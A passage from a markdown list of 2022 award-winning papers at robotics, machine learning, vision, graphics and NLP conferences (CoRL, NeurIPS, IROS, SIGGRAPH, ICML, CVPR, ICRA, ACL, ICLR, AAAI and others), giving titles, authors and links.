December 14-18, 2022) **Best Paper:** **1**- [Training Robots to Evaluate Robots: Example-BasedInteractive Reward Functions for Policy Learning](https://arxiv.org/abs/2212.08961) [Kun Huang](https://scholar.google.com/citations?user=CSzbLwUAAAAJ&hl=en), [Edward S. Hu](https://scholar.google.com/citations?user=so6uzIwAAAAJ&hl=en), [Dinesh Jayaraman](https://scholar.google.com/citations?user=QxLpghAAAAAJ&hl=en) **Best System Paper:** **2**- [Legged Locomotion in Challenging Terrains using Egocentric Vision](https://arxiv.org/abs/2211.07638) [Ananye Agarwal](https://anag.me/), [Ashish Kumar](https://ashish-kmr.github.io/), [Jitendra Malik](https://scholar.google.co.jp/citations?user=aOklxsQAAAAJ&hl=ja), [Deepak Pathak](https://scholar.google.com/citations?user=AEsPCAUAAAAJ&hl=en) **Special Innovation Paper:** **3**- [Do As I Can, Not As I Say: Grounding Language in Robotic Affordances](https://arxiv.org/abs/2204.01691) [Michael Ahn](https://scholar.google.com/citations?user=xou_1u0AAAAJ&hl=en), [Anthony Brohan](https://www.researchgate.net/scientific-contributions/Anthony-Brohan-2174998459), [Noah Brown](https://scholar.google.com/citations?user=wHuVMCkAAAAJ&hl=en), [Yevgen Chebotar](https://scholar.google.com/citations?user=ADkiClQAAAAJ&hl=en), Omar Cortes, Byron David, [Chelsea Finn](https://scholar.google.com/citations?user=vfPE6hgAAAAJ&hl=en), [Chuyuan Fu](https://scholar.google.com/citations?user=bDq7MZMAAAAJ&hl=en), [Keerthana Gopalakrishnan](https://scholar.google.com/citations?user=uemlfQYAAAAJ), [Karol Hausman](https://scholar.google.com/citations?user=yy0UFOwAAAAJ&hl=en), [Alex Herzog](https://scholar.google.com/citations?user=jrfFYAIAAAAJ&hl=en), [Daniel Ho](https://scholar.google.com/citations?user=i05Kw5cAAAAJ&hl=en), [Jasmine Hsu](https://scholar.google.com/citations?user=WcXt6YQAAAAJ&hl=en), [Julian Ibarz](https://scholar.google.com/citations?user=l-la0GQAAAAJ&hl=en), [Brian Ichter](https://scholar.google.com/citations?user=-w5DuHgAAAAJ&hl=en), [Alex Irpan](https://scholar.google.com/citations?user=ZZNxNAYAAAAJ&hl=en), [Eric Jang](https://scholar.google.com/citations?user=Izhkp4YAAAAJ&hl=en), Rosario Jauregui Ruano, Kyle Jeffrey, Sally Jesmonth, [Nikhil J Joshi](https://scholar.google.com/citations?user=Cmf2HdcAAAAJ&hl=en), [Ryan Julian](https://scholar.google.com/citations?user=8C2_ZVsAAAAJ&hl=en), [Dmitry Kalashnikov](https://scholar.google.com/citations?user=2DBmo-wAAAAJ&hl=en), Yuheng Kuang, [Kuang-Huei Lee](https://scholar.google.com/citations?user=rE7-N30AAAAJ), [Sergey Levine](https://scholar.google.com/citations?user=8R35rCwAAAAJ&hl=en), Yao Lu, Linda Luu, [Carolina Parada](https://scholar.google.com/citations?user=X5nQcywAAAAJ&hl=en), [Peter Pastor](https://scholar.google.com/citations?user=_ws9LLgAAAAJ&hl=en), Jornell Quiambao, [Kanishka Rao](https://scholar.google.com/citations?user=wotfaAgAAAAJ&hl=en), Jarek Rettinghouse, Diego Reyes, [Pierre Sermanet](https://scholar.google.com/citations?user=0nPi5YYAAAAJ&hl=en), Nicolas Sievers, Clayton Tan, [Alexander Toshev](https://scholar.google.com/citations?user=T6PbwPIAAAAJ&hl=en), [Vincent Vanhoucke](https://scholar.google.com/citations?user=T7uctwYAAAAJ&hl=en), [Fei Xia](https://scholar.google.com/citations?user=pqP5_PgAAAAJ&hl=en), [Ted Xiao](https://scholar.google.com/citations?user=LIJQ_ZYAAAAJ&hl=en), Peng Xu, Sichun Xu, [Mengyuan Yan](https://scholar.google.com/citations?user=-S_9ZRcAAAAJ&hl=en), [Andy Zeng](https://scholar.google.com/citations?user=q7nFtUcAAAAJ&hl=en) # NeurIPS 2022 (New Orleans, USA. 
December 6-14, 2022) **Outstanding Paper:** **1**- [Is Out-of-distribution Detection Learnable?](https://arxiv.org/abs/2210.14707) [Zhen Fang](https://fang-zhen.github.io/index.html), Yixuan Li, [Jie Lu](https://scholar.google.com.au/citations?user=KKo7jCMAAAAJ&hl=en), [Jiahua Dong](https://scholar.google.com/citations?user=xrXqa8AAAAAJ&hl=zh-CN), [Bo Han](https://scholar.google.com/citations?hl=zh-CN&user=nTNjqHwAAAAJ), [Feng Liu](https://scholar.google.com/citations?user=eqe3JS8AAAAJ&hl=zh-CN) **3**- [Photorealistic Text-to-Image Diffusion Models with Deep Language Understanding](https://arxiv.org/abs/2205.11487) [Chitwan Saharia](https://scholar.google.co.in/citations?user=JApued4AAAAJ&hl=en), [William Chan](https://scholar.google.com/citations?user=Nla9qfUAAAAJ&hl=en), [Saurabh Saxena](https://scholar.google.com/citations?user=WTz38osAAAAJ&hl=en), Lala Li, [Jay Whang](https://scholar.google.com/citations?user=rBH-cpMAAAAJ&hl=en), [Emily Denton](https://scholar.google.com/citations?user=pcFsc-AAAAAJ&hl=en), [Seyed Kamyar Seyed Ghasemipour](https://scholar.google.ca/citations?user=LHvso9QAAAAJ&hl=en), Burcu Karagol Ayan, [S. Sara Mahdavi](https://scholar.google.com/citations?user=cA0ELoQAAAAJ&hl=en), [Rapha Gontijo Lopes](https://scholar.google.com/citations?user=-wpZQY0AAAAJ&hl=en), [Tim Salimans](https://scholar.google.nl/citations?user=w68-7AYAAAAJ&hl=en), [Jonathan Ho](https://scholar.google.com/citations?user=iVLAQysAAAAJ&hl=en), [David J Fleet](https://scholar.google.com/citations?user=njOmQFsAAAAJ), [Mohammad Norouzi](https://scholar.google.ca/citations?user=Lncr-VoAAAAJ&hl=en) **2**- [Elucidating the Design Space of Diffusion-Based Generative Models](https://arxiv.org/abs/2206.00364) [Tero Karras](https://www.semanticscholar.org/author/Tero-Karras/2976930), [Miika Aittala](https://scholar.google.com/citations?user=-_EKVQ0AAAAJ&hl=en), [Timo Aila](https://scholar.google.com/citations?user=e7abmgkAAAAJ&hl=en), [Samuli Laine](https://scholar.google.com/citations?user=UCXJOTUAAAAJ&hl=en) **3**- [ProcTHOR: Large-Scale Embodied AI Using Procedural Generation](https://arxiv.org/abs/2206.06994) [Matt Deitke](https://scholar.google.com/citations?user=k4VxCcYAAAAJ&hl=en), [Eli VanderBilt](https://scholar.google.com/citations?user=RQDywYwAAAAJ&hl=en), [Alvaro Herrasti](https://scholar.google.de/citations?user=89Knd5YAAAAJ&hl=en), [Luca Weihs](https://scholar.google.com/citations?user=F_RBceUAAAAJ&hl=en), [Jordi Salvador](https://scholar.google.de/citations?user=YuRVs2oAAAAJ&hl=en), [Kiana Ehsani](https://scholar.google.com/citations?user=RScZCLEAAAAJ&hl=en), Winson Han, [Eric Kolve](https://www.semanticscholar.org/author/Eric-Kolve/3386570), [Ali Farhadi](https://scholar.google.com/citations?user=jeOFRDsAAAAJ&hl=en), [Aniruddha Kembhavi](https://scholar.google.com/citations?user=JnUevM0AAAAJ&hl=en), [Roozbeh Mottaghi](https://scholar.google.com/citations?user=CCV58dgAAAAJ&hl=en) **4**- [Using natural language and program abstractions to instill human inductive biases in machines](https://arxiv.org/abs/2205.11558) [Sreejan Kumar](https://scholar.google.com/citations?user=Hft2m4wAAAAJ&hl=en), [Carlos G Correa](https://scholar.google.com/citations?user=_Lt_IHMAAAAJ&hl=en), [Ishita Dasgupta](https://scholar.google.com/citations?user=eJt6cSIAAAAJ&hl=en), [Raja Marjieh](https://scholar.google.com/citations?user=h-pwCMUAAAAJ&hl=en), [Michael Hu](https://scholar.google.com/citations?user=TyyftvAAAAAJ&hl=en), [Robert D. 
Hawkins](https://scholar.google.com/citations?user=7EPsnxEAAAAJ&hl=en), [Nathaniel D. Daw](https://scholar.google.com/citations?user=BxlScrEAAAAJ&hl=en), [Jonathan D. Cohen](https://scholar.google.com/citations?user=NCkkQAMAAAAJ&hl=en), [Karthik Narasimhan](https://scholar.google.com/citations?user=euc0GX4AAAAJ&hl=en), [Thomas L. Griffiths](https://scholar.google.com/citations?user=UAwKvEsAAAAJ&hl=en) **5**- [A Neural Corpus Indexer for Document Retrieval](https://arxiv.org/abs/2206.02743) [Yujing Wang](https://scholar.google.com/citations?user=YgL4rywAAAAJ&hl=en), Yingyan Hou, [Haonan Wang](https://scholar.google.com/citations?user=BP3l2RYAAAAJ&hl=en), Ziming Miao, [Shibin Wu](https://www.researchgate.net/profile/Shibin-Wu), [Hao Sun](https://scholar.google.com/citations?user=PaxAtLkAAAAJ&hl=en), [Qi Chen](https://scholar.google.com/citations?user=5e_o4XUAAAAJ&hl=en), Yuqing Xia, Chengmin Chi, [Guoshuai Zhao](https://scholar.google.com/citations?user=M1tGUAwAAAAJ&hl=zh-CN), Zheng Liu, [Xing Xie](https://scholar.google.com/citations?user=5EQfAFIAAAAJ&hl=en), Hao Allen Sun, Weiwei Deng, Qi Zhang, [Mao Yang](https://scholar.google.com/citations?user=LgJqohwAAAAJ&hl=en) **6**- [High-dimensional limit theorems for SGD: Effective dynamics and critical scaling](https://arxiv.org/abs/2206.04030) [Gerard Ben Arous](https://scholar.google.com/citations?user=8sGC5D4AAAAJ&hl=en), [Reza Gheissari](https://scholar.google.com/citations?user=IQbXmlgAAAAJ&hl=en), [Aukosh Jagannath](https://scholar.google.fr/citations?user=1gpz5TAAAAAJ&hl=en) **7**- [Gradient Descent: The Ultimate Optimizer](https://arxiv.org/abs/1909.13371) [Kartik Chandra](https://scholar.google.com/citations?user=oVcz4nIAAAAJ&hl=en), Audrey Xie, [Jonathan Ragan-Kelley](https://scholar.google.com/citations?user=nBcay4oAAAAJ&hl=en), [Erik Meijer](https://scholar.google.com/citations?user=odFMpOYAAAAJ&hl=en) **8**- [Riemannian Score-Based Generative Modelling](https://arxiv.org/abs/2202.02763) [Valentin De Bortoli](https://scholar.google.com/citations?user=dn_F9I4AAAAJ), [Emile Mathieu](https://scholar.google.com/citations?user=g9BjTqgAAAAJ), [Michael Hutchinson](https://scholar.google.com/citations?user=ot1m2GUAAAAJ&hl=en), [James Thornton](https://scholar.google.co.uk/citations?user=oFZHOwgAAAAJ&hl=en), [Yee Whye Teh](https://scholar.google.com/citations?user=y-nUzMwAAAAJ&hl=en), [Arnaud Doucet](https://scholar.google.com/citations?user=W4SZGV8AAAAJ&hl=en) **9**- [Gradient Estimation with Discrete Stein Operators](https://arxiv.org/abs/2202.09497) [Jiaxin Shi](https://scholar.google.com/citations?user=juZXbFoAAAAJ&hl=en), [Yuhao Zhou](https://scholar.google.com/citations?user=GKLRbxoAAAAJ&hl=en), Jessica Hwang, [Michalis K. 
Titsias](https://scholar.google.gr/citations?user=B-SbkAwAAAAJ&hl=el), [Lester Mackey](https://scholar.google.com/citations?user=erv7TP0AAAAJ&hl=en) **10**- [An empirical analysis of compute-optimal large language model training](https://arxiv.org/abs/2203.15556) [Jordan Hoffmann](https://scholar.google.com/citations?user=4A91qjAAAAAJ&hl=en), [Sebastian Borgeaud](https://scholar.google.co.uk/citations?user=-KzSL30AAAAJ&hl=en), [Arthur Mensch](https://scholar.google.fr/citations?user=F8riAN8AAAAJ&hl=fr), Elena Buchatskaya, [Trevor Cai](https://scholar.google.com/citations?user=li9aM1MAAAAJ), Eliza Rutherford, Diego de Las Casas, [Lisa Anne Hendricks](https://scholar.google.com/citations?user=pvyI8GkAAAAJ&hl=en), [Johannes Welbl](https://scholar.google.com/citations?user=SaHRjy4AAAAJ&hl=en), [Aidan Clark](https://scholar.google.com/citations?user=_19DrfIAAAAJ&hl=en), [Tom Hennigan](https://scholar.google.co.uk/citations?user=XnO_69oAAAAJ&hl=en), [Eric Noland](https://www.semanticscholar.org/author/Eric-Noland/51210148), [Katie Millican](https://scholar.google.com/citations?user=xJhN7QcAAAAJ&hl=en), [George van den Driessche](https://scholar.google.com/citations?user=2XfigMEAAAAJ&hl=en), Bogdan Damoc, [Aurelia Guy](https://www.researchgate.net/scientific-contributions/Aurelia-Guy-2209309561), [Simon Osindero](https://scholar.google.com/citations?user=Jq8ZS5kAAAAJ&hl=en), [Karen Simonyan](https://scholar.google.com/citations?user=L7lMQkQAAAAJ&hl=en), [Erich Elsen](https://scholar.google.com/citations?user=5d2Ss9EAAAAJ&hl=en), [Jack W. Rae](https://www.researchgate.net/scientific-contributions/Jack-W-Rae-2139424573), [Oriol Vinyals](https://scholar.google.com/citations?user=NkzyCvUAAAAJ&hl=en), [Laurent Sifre](https://scholar.google.com/citations?user=0kVh58wAAAAJ&hl=en) **11**- [Beyond neural scaling laws: beating power law scaling via data pruning](https://arxiv.org/abs/2206.14486) [Ben Sorscher](https://scholar.google.com/citations?user=v9-8fLEAAAAJ&hl=en), [Robert Geirhos](https://scholar.google.com/citations?user=w3kGtMIAAAAJ), [Shashank Shekhar](https://scholar.google.com/citations?user=UpV5wyYAAAAJ&hl=en), [Surya Ganguli](https://scholar.google.com/citations?user=rF2VvOgAAAAJ&hl=en), [Ari S. Morcos](https://scholar.google.com/citations?user=v-A_7UsAAAAJ&hl=en) **12**- [On-Demand Sampling: Learning Optimally from Multiple Distributions](https://arxiv.org/abs/2210.12529) [Nika Haghtalab](https://scholar.google.com/citations?user=C6pnolkAAAAJ&hl=en), [Michael I. 
Jordan](https://scholar.google.com/citations?user=yxUduqMAAAAJ&hl=en), [Eric Zhao](https://scholar.google.com/citations?user=TrxBpSYAAAAJ) **Datasets & Benchmarks Best Paper:** **1**- [LAION-5B: An open large-scale dataset for training next generation image-text models](https://arxiv.org/abs/2210.08402) Christoph Schuhmann, [Romain Beaumont](https://scholar.google.com/citations?user=jhtyYGAAAAAJ&hl=en), Richard Vencu, [Cade Gordon](https://scholar.google.com/citations?user=yma-bZUAAAAJ&hl=en), [Ross Wightman](https://scholar.google.com/citations?user=cLfKCzoAAAAJ&hl=en), [Mehdi Cherti](https://scholar.google.com/citations?user=JgOyYi8AAAAJ), Theo Coombes, Aarush Katta, Clayton Mullis, [Mitchell Wortsman](https://scholar.google.com/citations?user=fzRnjFgAAAAJ), [Patrick Schramowski](https://scholar.google.com/citations?user=GD481RkAAAAJ&hl=de), Srivatsa Kundurthy, Katherine Crowson, [Ludwig Schmidt](https://scholar.google.com/citations?user=SWMKy70AAAAJ&hl=en), [Robert Kaczmarczyk](https://www.researchgate.net/profile/Robert-Kaczmarczyk-2), [Jenia Jitsev](https://scholar.google.de/citations?user=p1FuAMkAAAAJ&hl=en) **2**- [MineDojo: Building Open-Ended Embodied Agents with Internet-Scale Knowledge](https://arxiv.org/abs/2206.08853) [Linxi Fan](https://scholar.google.com/citations?user=sljtWIUAAAAJ&hl=en), [Guanzhi Wang](https://scholar.google.com/citations?user=QDmEj4MAAAAJ), [Yunfan Jiang](https://scholar.google.com/citations?user=s8Epvl4AAAAJ), [Ajay Mandlekar](https://scholar.google.com/citations?user=MEz23joAAAAJ), [Yuncong Yang](https://scholar.google.com/citations?hl=en&user=IgQuUY0AAAAJ), [Haoyi Zhu](https://www.haoyizhu.site/), Andrew Tang, [De-An Huang](https://scholar.google.com/citations?user=HEY3UzgAAAAJ), [Yuke Zhu](https://scholar.google.com/citations?user=mWGyYMsAAAAJ&hl=en), [Anima Anandkumar](https://scholar.google.com/citations?user=bEcLezcAAAAJ&hl=en) **Test of Time:** **1**- [ImageNet Classification with Deep Convolutional Neural Networks](https://proceedings.neurips.cc/paper_files/paper/2012/file/c399862d3b9d6b76c8436e924a68c45b-Paper.pdf) [Alex Krizhevsky](https://scholar.google.com/citations?user=xegzhJcAAAAJ&hl=en), [Ilya Sutskever](https://scholar.google.com/citations?user=x04W_mMAAAAJ&hl=en), [Geoffrey Hinton](https://scholar.google.com/citations?user=JicYPdAAAAAJ) # Humanoids 2022 (Ginowan, Japan. November 28-30, 2022) **Best Oral Paper:** **1**- [A Fast, Autonomous, Bipedal Walking Behavior over Rapid Regions](https://arxiv.org/abs/2207.08312) Duncan Calvert, [Bhavyansh Mishra](https://scholar.google.com/citations?user=XzPu6zQAAAAJ), [Stephen McCrory](https://scholar.google.com/citations?user=L8ozqB8AAAAJ&hl=en), [Sylvain Bertrand](https://scholar.google.com/citations?user=t3jIVzcAAAAJ&hl=en), Robert Griffin, [Jerry Pratt](https://scholar.google.com/citations?user=NfeARS4AAAAJ&hl=en) **Best Interactive Paper:** **2**- [A Guideline for Humanoid Leg Design with Oblique Axes for Bipedal Locomotion](https://elib.dlr.de/192270/2/ICHR22_Fruend_Oblique_axes_Dez_copyright.pdf) Konrad Fründ, Anton Leonhard Shu, [Florian Christoph Loeffl](https://www.researchgate.net/scientific-contributions/Florian-Christoph-Loeffl-2120316963), [Christian Ott](https://scholar.google.de/citations?user=FOgCAxsAAAAJ&hl=en) # IROS 2022 (Kyoto, Japan. 
October 23-27, 2022) **Best Paper:** **1-** [SpeedFolding: Learning Efficient Bimanual Folding of Garments](https://arxiv.org/abs/2208.10552) [Yahav Avigal](https://scholar.google.com/citations?user=CCAaFCQAAAAJ), [Lars Berscheid](https://www.researchgate.net/scientific-contributions/Lars-Berscheid-2048462383), [Tamim Asfour](https://scholar.google.com/citations?user=65bIT4oAAAAJ&hl=en), [Torsten Kröger](https://scholar.google.com/citations?user=bfec5vAAAAAJ), [Ken Goldberg](https://scholar.google.com/citations?user=8fztli4AAAAJ&hl=en) **Best Student Paper:** **2**- [FAR Planner: Fast, Attemptable Route Planner using Dynamic Visibility Update](https://arxiv.org/abs/2110.09460) [Fan Yang](https://scholar.google.com/citations?user=t7p8nOQAAAAJ&hl=en), Chao Cao, Hongbiao Zhu, Jean Oh, Ji Zhang **Best Application Paper:** **3**- Soft Tissue Characterisation Using a Novel Robotic Medical Percussion Device with Acoustic Analysis and Neural Networks Pilar Zhang Qiu, Yongxuan Tan, Oliver Thompson, Bennet Cobley, and Thrishantha Nanayakkara **Best Cognitive Robotics Paper:** **4**- Gesture2Vec: Clustering Gestures using Representation Learning Methods for Co-speech Gesture Generation Payam Jome Yazdian, Mo Chen, and Angelica Lim **Best Mobile Manipulation Paper:** **5**- Robot Learning of Mobile Manipulation with Reachability Behavior Priors Snehal Jauhri, Jan Peters, and Georgia Chalvatzaki **Best Robot Mechanism and Design Paper:** **6**- Aerial Grasping and the Velocity Sufficiency Region Tony G. Chen, Kenneth Hoffmann, JunEn Low, Keiko Nagami, David Lentink, and Mark Cutkosky **Best RoboCup Paper:** **7**- RCareWorld: A Human-centric Simulation World for Caregiving Robots Ruolin Ye, Wenqiang Xu, Haoyuan Fu, Rajat Kumar, Jenamani, Vy Nguyen, Cewu Lu, Katherine Dimitropoulou, and Tapomayukh Bhattacharjee **8**- SpeedFolding: Learning Efficient Bimanual Folding of Garments Yahav Avigal, Lars Burscheid, Tamim Asfour, Torsten Kroeger, and Ken Goldberg **Best Entertainment and Amusement Paper:** **9**- Robot Learning to Paint from Demonstrations Younghyo Park, Seunghun Jeon, and Taeyoon Lee **Best Safety, Security, and Rescue Robotics Paper:** **10**- Power-based Safety Layer for Aerial Vehicles in Physical Interaction using Lyapunov Exponents Eugenio Cuniato, Nicholas Lawrance, Marco Tognon, and Roland Siegwart **Best Agri-Robotics Paper:** **11**- Explicitly Incorporating Spatial Information to Recurrent Networks for Agriculture Claus Smitt, Michael Allan Halstead, Alireza Ahmadi, and Christopher Steven McCool **Best Industrial Robotics Research for Applications:** **12**- Absolute Position Detection in 7-Phase Sensorless Electric Stepper Motor Vincent Groenhuis, Gijs Rolff, Koen Bosman, Leon Abelmann, and Stefano Stramigioli # SIGGRAPH 2022 (Vancouver, Canada. August 8-11, 2022) **Best Paper:** **1**- Image Features Influence Reaction Time: A Learned Probabilistic Perceptual Model for Saccade Latency Budmonde Duinkharjav, Praneeth Chakravarthula, Rachel Brown, Anjul Patney, Qi Sun **2**- CLIPasso: Semantically Aware Object Sketching Yael Vinker, Ehsan Pajouheshgar, Jessica Y. 
Bo, Roman Christian Bachmann, Amit Bermano, Daniel Cohen-Or, Amir Zamir, Ariel Shamir **3**- Instant Neural Graphics Primitives with a Multiresolution Hash Encoding Thomas Müller, Alex Evans, Christoph Schied, Alexander Keller **4**- Spelunking the Deep: Guaranteed Queries on General Neural Implicit Surfaces Nicholas Sharp, Alec Jacobson **5**- DeepPhase: Periodic Autoencoders for Learning Motion Phase Manifolds Sebastian Starke, Ian Mason, Taku Komura # ICML 2022 (Baltimore, USA. July 17-23, 2022) **Outstanding Paper:** **1**- Stable Conformal Prediction Sets Eugene Ndiaye **2**- G-Mixup: Graph Data Augmentation for Graph Classification Xiaotian Han, Zhimeng Jiang, Ninghao Liu, Xia Hu **3**- Learning Mixtures of Linear Dynamical Systems Yanxi Chen, H. Vincent Poor **4**- The Importance of Non-Markovianity in Maximum State Entropy Exploration Mirco Mutti, Riccardo De Santi, Marcello Restelli **5**- Do Differentiable Simulators Give Better Policy Gradients? Hyung Ju Suh, Max Simchowitz, Kaiqing Zhang, Russ Tedrake **6**- Causal Conceptions of Fairness and their Consequences Hamed Nilforoshan, Johann Gaebler, Ravi Shroff, Sharad Goel **7**- Solving Stackelberg Prediction Game with Least Squares Loss via Spherically Constrained Least Squares Reformulation Jiali Wang, Wen Huang, Rujun Jiang, Xudong Li, Alex Wang **8**- Privacy for Free: How does Dataset Condensation Help Privacy? Tian Dong, Bo Zhao, Lingjuan Lyu **9**- Bayesian Model Selection, the Marginal Likelihood, and Generalization Sanae Lotfi, Pavel Izmailov, Gregory Benton, Micah Goldblum, Andrew Wilson **10**- Understanding Dataset Difficulty with V-Usable Information Kawin Ethayarajh, Yejin Choi, Swabha Swayamdipta **Test of Time:** **11**- Poisoning Attacks Against Support Vector Machines Battista Biggio, Blaine Nelson, Pavel Laskov **Best Paper:** **1**- Iterative Residual Policy for Goal-Conditioned Dynamic Manipulation of Deformable Objects Cheng Chi, Benjamin CM Burchfiel, Eric Cousineau, Siyuan Feng, and Shuran Song **Best Student Paper:** **1**- AK: Attentive Kernel for Information Gathering Weizhe Chen, Roni Khardon, and Lantao Liu **Best Systems Paper:** **1**- Autonomously Untangling Long Cables Kaushik Shivakumar, Vainavi Viswanath, Justin Kerr, Brijen Thananjeyan, Ellen Novoseller, Jeffrey Ichnowski, Ken Goldberg, Joseph Gonzalez, Michael Laskey, and Alejandro Escontrela **Test of Time:** Sampling-based algorithms for optimal motion planning Sertac Karaman, Emilio Frazzoli # CVPR 2022 (New Orleans, USA. June 19-24, 2022) **Best Paper:** **1**- Learning to Solve Hard Minimal Problems Petr Hruby, Timothy Duff, Anton Leykin, Tomas Pajdla **Best Student Paper:** **1**- EPro-PnP: Generalized End-to-End Probabilistic Perspective-n-Points for Monocular Object Pose Estimation Hansheng Chen, Pichao Wang, Fan Wang, Wei Tian, Lu Xiong, Hao Li **Best Paper Honorable Mention:** **1**- Dual-Shutter Optical Vibration Sensing Mark Sheinin, Dorian Chan, Matthew O'Toole, Srinivasa Narasimhan **Best Student Paper Honorable Mention:** **1**- Ref-NeRF: Structured View-Dependent Appearance for Neural Radiance Fields Dor Verbin, Peter Hedman, Ben Mildenhall, Todd Zickler, Jonathan Barron, Pratul Srinivasan # ICRA 2022 (Philadelphia, USA. 
May 23-27, 2022) **Outstanding Paper:** **1**- Translating Images into Maps Avishkar Saha, Oscar Alejandro Mendez Maldonado, Chris Russell, Richard Bowden **Outstanding Student Paper:** **1**- Interactive Robotic Grasping with Attribute-Guided Disambiguation Yang Yang, Xibai Lou, Changhyun Choi **Outstanding Automation Paper:** **1**- Precise 3D Reconstruction of Plants from UAV Imagery Combining Bundle Adjustment and Template Matching Elias Ariel Marks, Federico Magistri, Cyrill Stachniss **Outstanding Coordination Paper:** **1**- Decentralized Model Predictive Control for Equilibrium-based Collaborative UAV Bar Transportation Roberto Castro Sundin, Pedro Roque, Dimos V. Dimarogonas **Outstanding Deployed Systems Paper:** **1**- Autonomous Teamed Exploration of Subterranean Environments using Legged and Aerial Robots Mihir Kulkarni, Mihir Rahul Dharmadhikari, Marco Tranzatto, Samuel Zimmermann, Victor Reijgwart, Paolo De Petris, Huan Nguyen, Nikhil Vijay Khedekar, Christos Papachristos, Lionel Ott, Roland Siegwart, Marco Hutter, Kostas Alexis **Outstanding Dynamics and Control Paper:** **1**- Cooperative Modular Single Actuator Monocopters Capable of Controlled Passive Separation Xinyu Cai, Shane Kyi Hla Win, Luke Soe Thura Win, Danial Sufiyan, Shaohui Foong **Outstanding Interaction Paper:** **1**- Human-Robot Shared Control for Surgical Robot Based on Context-Aware Sim-to-Real Adaptation Dandan Zhang, Zicong Wu, Junhong Chen, Ruiqi Zhu, Adnan Munawar, Bo Xiao, Yuan Guan, Hang Su, Yao Guo, Gregory Scott Fischer, Benny Ping Lai Lo, Guang-Zhong Yang **Outstanding Learning Paper:** **1**- Augmenting Reinforcement Learning with Behavior Primitives for Diverse Manipulation Tasks Nasiriany, Soroush; Liu, Huihan; Zhu, Yuke Outstanding Locomotion Paper: Trajectory Optimization Formulation with Smooth Analytical Derivatives for Track-leg and Wheel-leg Ground Robots Adwait Mane, Dylan Swart, Jason White, Christian Hubicki Outstanding Manipulation Paper: Manipulation of unknown objects via contact configuration regulation Neel Doshi, Orion Taylor, Alberto Rodriguez Outstanding Mechanisms and Design Paper: Design of a Biomimetic Tactile Sensor for Material Classification Kevin Dai, Xinyu Wang, Allison M. Rojas, Evan Harber, Yu Tian, Nicholas Paiva, Joseph Gnehm, Evan Schindewolf, Howie Choset, Victoria Webster-Wood, Lu Li Outstanding Navigation Paper: EDPLVO: Efficient Direct Point-Line Visual Odometry Lipu Zhou, Guoquan (Paul) Huang, Yinian Mao, Shengze Wang, Michael Kaess Outstanding Planning Paper: Non-Gaussian Risk Bounded Trajectory Optimization for Stochastic Nonlinear Systems in Uncertain Environments Weiqiao Han, Ashkan M. Jasour, Brian Williams # ACL 2022 (Dublin, Ireland. May 22-27, 2022) Best Paper: Learned Incremental Representations for Parsing Nikita Kitaev, Thomas Lu, Dan Klein Best Special Theme Paper: Requirements and Motivations of Low-Resource Speech Synthesis for Language Revitalization Aidan Pine, Dan Wells, Nathan Brinklow, Patrick William Littell, Korin Richmond Best Resource Paper: DiBiMT: A Novel Benchmark for Measuring Word Sense Disambiguation Biases in Machine Translation Niccolò Campolungo, Federico Martelli, Francesco Saina, Roberto Navigli Best Linguistic Insight Paper: KinyaBERT: a Morphology-aware Kinyarwanda Language Model Antoine Nzeyimana, Andre Niyongabo Rubungo Outstanding Paper: ​ Evaluating Factuality in Text Simplification Ashwin Devaraj, William Berkeley Sheffield, Byron C. 
Wallace, Junyi Jessy Li Online Semantic Parsing for Latency Reduction in Task-Oriented Dialogue Jiawei Zhou, Jason Eisner, Michael Newman, Emmanouil Antonios Platanios, Sam Thomson Learning to Generalize to More: Continuous Semantic Augmentation for Neural Machine Translation Xiangpeng Wei, Heng Yu, Yue Hu, Rongxiang Weng, Weihua Luo, Rong Jin Fantastically Ordered Prompts and Where to Find Them: Overcoming Few-Shot Prompt Order Sensitivity Yao Lu, Max Bartolo, Alastair Moore, Sebastian Riedel, Pontus Stenetorp Inducing Positive Perspectives with Text Reframing Caleb Ziems, Minzhi Li, Anthony Zhang, Diyi Yang Ditch the Gold Standard: Re-evaluating Conversational Question Answering Huihan Li, Tianyu Gao, Manan Goenka, Danqi Chen Active Evaluation: Efficient NLG Evaluation with Few Pairwise Comparisons Akash Kumar Mohankumar, Mitesh M. Khapra Compression of Generative Pre-trained Language Models via Quantization Chaofan Tao, Lu Hou, Wei Zhang, Lifeng Shang, Xin Jiang, Qun Liu, Ping Luo, Ngai Wong # ICLR 2022 (Online. April 25-29, 2022) Outstanding Paper: Analytic-DPM: an Analytic Estimate of the Optimal Reverse Variance in Diffusion Probabilistic Models Fan Bao, Chongxuan Li, Jun Zhu, Bo Zhang Hyperparameter Tuning with Renyi Differential Privacy Nicolas Papernot, Thomas Steinke Learning Strides in Convolutional Neural Networks Rachid Riad, Olivier Teboul, David Grangier, Neil Zeghidour Expressiveness and Approximation Properties of Graph Neural Networks Floris Geerts, Juan L Reutter Comparing Distributions by Measuring Differences that Affect Decision Making Shengjia Zhao, Abhishek Sinha, Yutong (Kelly) He, Aidan Perreault, Jiaming Song, Stefano Ermon Neural Collapse Under MSE Loss: Proximity to and Dynamics on the Central Path X.Y. Han, Vardan Papyan, David L. Donoho Bootstrapped Meta-Learning Sebastian Flennerhag, Yannick Schroecker, Tom Zahavy, Hado van Hasselt, David Silver, Satinder Singh # AAAI 2022 (Online. February 22 - March 1, 2022) Outstanding Paper: Online certification of preference-based fairness for personalized recommendersystems Virginie Do, Sam Corbett-Davies, Jamal Atif, Nicolas Usunier Outstanding Student Paper: InfoLM: A New Metric to Evaluate Summarization & Data2Text Generation Pierre Colombo, Chloé Clavel, Pablo Piantanida Best Student Abstract: Annotation Cost-Sensitive Deep Active Learning with Limited Data Renaud Bernatchez, Audrey Durand and Flavie Lavoie-Cardinal Distinguished Paper: AlphaHoldem: High-Performance Artificial Intelligence for Heads-Up No-Limit Poker via End-to-End Reinforcement Learning Enmin Zhao, Renye Yan, Jinqiu Li, Kai Li, Junliang Xing Certified Symmetry and Dominance Breaking for Combinatorial Optimisation Bart Bogaerts, Stephan Gocht, Ciaran McCreesh, Jakob Nordström Online Elicitation of Necessarily Optimal Matchings Jannik Peters Sampling-Based Robust Control of Autonomous Systems with Non-Gaussian Noise Thom S. Badings, Alessandro Abate, Nils Jansen, David Parker, Hasan A. Poonawala, Marielle Stoelinga Subset approximation of Pareto Regions with Bi-objective A* Jorge A. Baier, Carlos Hernández, Nicolás Rivera The SoftCumulative Constraint with Quadratic Penalty Yanick Ouellet, Claude-Guy Quimper Best Demonstration: A Demonstration of Compositional, Hierarchical Interactive Task Learning Aaron Mininger, John Laird # NeurIPS 2021 (Online. 
